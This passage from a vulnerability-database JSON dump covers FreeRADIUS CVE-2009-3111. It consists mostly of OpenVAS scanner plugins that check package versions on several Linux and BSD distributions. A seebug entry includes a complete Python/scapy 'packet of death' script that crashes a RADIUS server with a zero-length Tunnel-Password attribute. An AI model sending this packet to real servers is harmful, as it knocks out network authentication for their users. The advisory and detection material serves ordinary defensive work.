rpm:\"libfreeradius1-postgresql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libfreeradius1-unixODBC\", rpm:\"libfreeradius1-unixODBC~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1\", rpm:\"lib64freeradius1~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-devel\", rpm:\"lib64freeradius1-devel~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-krb5\", rpm:\"lib64freeradius1-krb5~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-ldap\", rpm:\"lib64freeradius1-ldap~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-mysql\", rpm:\"lib64freeradius1-mysql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-postgresql\", rpm:\"lib64freeradius1-postgresql~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64freeradius1-unixODBC\", rpm:\"lib64freeradius1-unixODBC~1.1.7~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:14:20", "references": ["http://www.vuxml.org/freebsd/1b3f854b-e4bd-11de-b276-000d8787e1be.html", "http://www.milw0rm.com/exploits/9642", "http://freeradius.org/security.html"], "pluginID": "66614", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-12-30T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "FreeBSD Ports: freeradius", "type": "openvas", "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "modified": "2017-03-21T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66614", "id": "OPENVAS:66614", "sourceData": "#\n#VID 1b3f854b-e4bd-11de-b276-000d8787e1be\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 1b3f854b-e4bd-11de-b276-000d8787e1be\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: freeradius\n\nCVE-2009-3111\nThe rad_decode function in FreeRADIUS before 1.1.8 allows remote\nattackers to cause a denial of service (radiusd crash) via zero-length\nTunnel-Password attributes. NOTE: this is a regression error related\nto CVE-2003-0967.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\n\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(66614);\n script_version(\"$Revision: 5656 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-21 12:03:12 +0100 (Tue, 21 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-3111\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"FreeBSD Ports: freeradius\");\n\n script_xref(name:\"URL\", value:\"http://freeradius.org/security.html\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/9642\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/1b3f854b-e4bd-11de-b276-000d8787e1be.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"freeradius\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.1.8\")<0) {\n txt += 'Package freeradius version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:25", "references": [], "pluginID": "66166", "description": "The remote host is missing updates to freeradius announced in\nadvisory CESA-2009:1451.", "edition": 2, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-11-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "CentOS Security Advisory CESA-2009:1451 (freeradius)", "type": "openvas", "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66166", "id": "OPENVAS:66166", "sourceData": "#CESA-2009:1451 66166 2\n# $Id: ovcesa2009_1451.nasl 6650 2017-07-10 11:43:12Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1451 (freeradius)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1451\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1451\nhttps://rhn.redhat.com/errata/RHSA-2009-1451.html\";\ntag_summary = \"The remote host is missing updates to freeradius announced in\nadvisory CESA-2009:1451.\";\n\n\n\nif(description)\n{\n script_id(66166);\n script_version(\"$Revision: 6650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:43:12 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-3111\", \"CVE-2003-0967\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"CentOS Security Advisory CESA-2009:1451 (freeradius)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-mysql\", rpm:\"freeradius-mysql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-postgresql\", rpm:\"freeradius-postgresql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-unixODBC\", rpm:\"freeradius-unixODBC~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:38:18", "references": [], "pluginID": "136141256231066166", "description": "The remote host is missing updates to freeradius announced in\nadvisory CESA-2009:1451.", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-11-11T00:00:00", "type": "openvas", "title": "CentOS Security Advisory CESA-2009:1451 (freeradius)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066166", "id": "OPENVAS:136141256231066166", "sourceData": "#CESA-2009:1451 66166 2\n# $Id: ovcesa2009_1451.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1451 (freeradius)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1451\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1451\nhttps://rhn.redhat.com/errata/RHSA-2009-1451.html\";\ntag_summary = \"The remote host is missing updates to freeradius announced in\nadvisory CESA-2009:1451.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66166\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-3111\", \"CVE-2003-0967\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"CentOS Security Advisory CESA-2009:1451 (freeradius)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-mysql\", rpm:\"freeradius-mysql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-postgresql\", rpm:\"freeradius-postgresql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-unixODBC\", rpm:\"freeradius-unixODBC~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:37:18", "references": ["http://www.redhat.com/security/updates/classification/#moderate", "http://rhn.redhat.com/errata/RHSA-2009-1451.html"], "pluginID": "136141256231064905", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1451.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker could use\nthis flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\nRADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, radiusd will be restarted automatically.", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-09-21T00:00:00", "title": "RedHat Security Advisory RHSA-2009:1451", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064905", "id": "OPENVAS:136141256231064905", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1451.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1451 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1451.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker could use\nthis flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\nRADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, radiusd will be restarted automatically.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64905\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-21 23:13:00 +0200 (Mon, 21 Sep 2009)\");\n script_cve_id(\"CVE-2009-3111\", \"CVE-2003-0967\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"RedHat Security Advisory RHSA-2009:1451\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1451.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#moderate\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-debuginfo\", rpm:\"freeradius-debuginfo~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-mysql\", rpm:\"freeradius-mysql~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-postgresql\", rpm:\"freeradius-postgresql~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"freeradius-unixODBC\", rpm:\"freeradius-unixODBC~1.1.3~1.5.el5_4\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:36:06", "references": ["2009:1451", "http://lists.centos.org/pipermail/centos-announce/2009-October/016228.html"], "pluginID": "1361412562310880824", "description": "Check for the Version of freeradius", "edition": 2, "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for freeradius CESA-2009:1451 centos5 i386", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880824", "id": "OPENVAS:1361412562310880824", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for freeradius CESA-2009:1451 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"FreeRADIUS is a high-performance and highly configurable free Remote\n Authentication Dial In User Service (RADIUS) server, designed to allow\n centralized authentication and authorization for a network.\n\n An input validation flaw was discovered in the way FreeRADIUS decoded\n specific RADIUS attributes from RADIUS packets. A remote attacker could use\n this flaw to crash the RADIUS daemon (radiusd) via a specially-crafted\n RADIUS packet. (CVE-2009-3111)\n \n Users of FreeRADIUS are advised to upgrade to these updated packages, which\n contain a backported patch to correct this issue. After installing the\n update, radiusd will be restarted automatically.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"freeradius on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-October/016228.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880824\");\n script_version(\"$Revision: 9371 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:55:06 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"CESA\", value: \"2009:1451\");\n script_cve_id(\"CVE-2009-3111\", \"CVE-2003-0967\");\n script_name(\"CentOS Update for freeradius CESA-2009:1451 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of freeradius\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"freeradius\", rpm:\"freeradius~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"freeradius-mysql\", rpm:\"freeradius-mysql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"freeradius-postgresql\", rpm:\"freeradius-postgresql~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"freeradius-unixODBC\", rpm:\"freeradius-unixODBC~1.1.3~1.5.el5_4\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T18:36:47", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "No description provided by source.", "reporter": "Root", "published": "2009-09-11T00:00:00", "title": "FreeRadius &lt; 1.1.8 Zero-length Tunnel-Password DoS Exploit (CVE-2009-3111)", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3111"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-09-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-14525", "id": "SSV:14525", "sourceData": "\n #!/usr/bin/env python\r\n# FreeRadius Packet Of Death\r\n# Matthew Gillespie 2009-09-11\r\n# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py\r\n# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/\r\n\r\nimport sys\r\nfrom scapy.all import IP,UDP,send,Radius,RadiusAttr\r\n\r\nif len(sys.argv) != 2:\r\n\tprint &quot;Usage: radius_killer.py &lt;radiushost&gt;\\n&quot;\r\n\tsys.exit(1)\r\n\r\nPoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \\\r\n\tRadius(code=1,authenticator=&quot;\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99&quot;,id=180)/ \\\r\n\tRadiusAttr(type=69,value=&quot;&quot;,len=2)\r\n\r\nsend(PoD)\r\n\r\n# sebug.net\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-14525", "status": "cve,poc"}], "centos": [{"lastseen": "2017-10-03T18:25:19", "references": ["https://rhn.redhat.com/errata/RHSA-2009-1451.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageFilename": "freeradius-1.1.3-1.5.el5_4.src.rpm", "packageName": "freeradius", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageFilename": "freeradius-1.1.3-1.5.el5_4.src.rpm", "packageName": "freeradius", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageFilename": "freeradius-mysql-1.1.3-1.5.el5_4.i386.rpm", "packageName": "freeradius-mysql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageFilename": "freeradius-mysql-1.1.3-1.5.el5_4.x86_64.rpm", "packageName": "freeradius-mysql", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageFilename": "freeradius-unixODBC-1.1.3-1.5.el5_4.i386.rpm", "packageName": "freeradius-unixODBC", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageFilename": "freeradius-unixODBC-1.1.3-1.5.el5_4.x86_64.rpm", "packageName": "freeradius-unixODBC", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageFilename": "freeradius-postgresql-1.1.3-1.5.el5_4.x86_64.rpm", "packageName": "freeradius-postgresql", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageFilename": "freeradius-1.1.3-1.5.el5_4.x86_64.rpm", "packageName": "freeradius", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageFilename": "freeradius-postgresql-1.1.3-1.5.el5_4.i386.rpm", "packageName": "freeradius-postgresql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "1.1.3-1.5.el5_4", "packageFilename": "freeradius-1.1.3-1.5.el5_4.i386.rpm", "packageName": "freeradius", "arch": "i386", "operator": "lt"}], "description": "**CentOS Errata and Security 